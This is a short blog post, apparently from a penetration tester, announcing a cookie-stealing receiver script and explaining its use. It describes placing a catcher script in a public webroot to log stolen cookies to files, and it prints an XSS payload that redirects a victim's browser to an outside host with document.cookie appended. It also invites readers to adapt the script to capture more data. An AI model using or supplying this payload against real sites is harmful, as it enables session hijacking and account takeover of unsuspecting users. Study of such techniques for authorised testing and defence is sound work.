Cookie Stealer

So this is a script I worked on a while ago. Although it was hacky and wasn’t the best written, so I had a Dev at my place take a quick look. After a bit of tidying up and rewriting it efficiently.

Many thanks to Thomas Gray (@topicus) at RandomStorm for his help with this, we now have a well coded cookie stealer and receiver \o/ woohoo.

The script is not very big and can be found over at my pastebin

The script should be placed in your webroot that is publicly available. The script will collect the cookies sent to them and place them into a .csv and a .txt file. (its up to you how you protect these files)

With the use of XSS, see the below examples:

document.location=”http://pentestserver.co.uk/catcher.php?c=”+document.cookie

the document.cookie will be sent over to the receiving script ready for you to read the cookies.


The script can be adapted to receive more than just document cookies of course so have fun with it. I cannot guarantee that the script is 100% secure but coding measures have been put in place to help.

So if you have any advice how to amend the script further then please send me a message.

Comments

Popular posts from this blog

Null Session Domain Controller Enumeration

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution

NetBIOS / NBNS Spoofing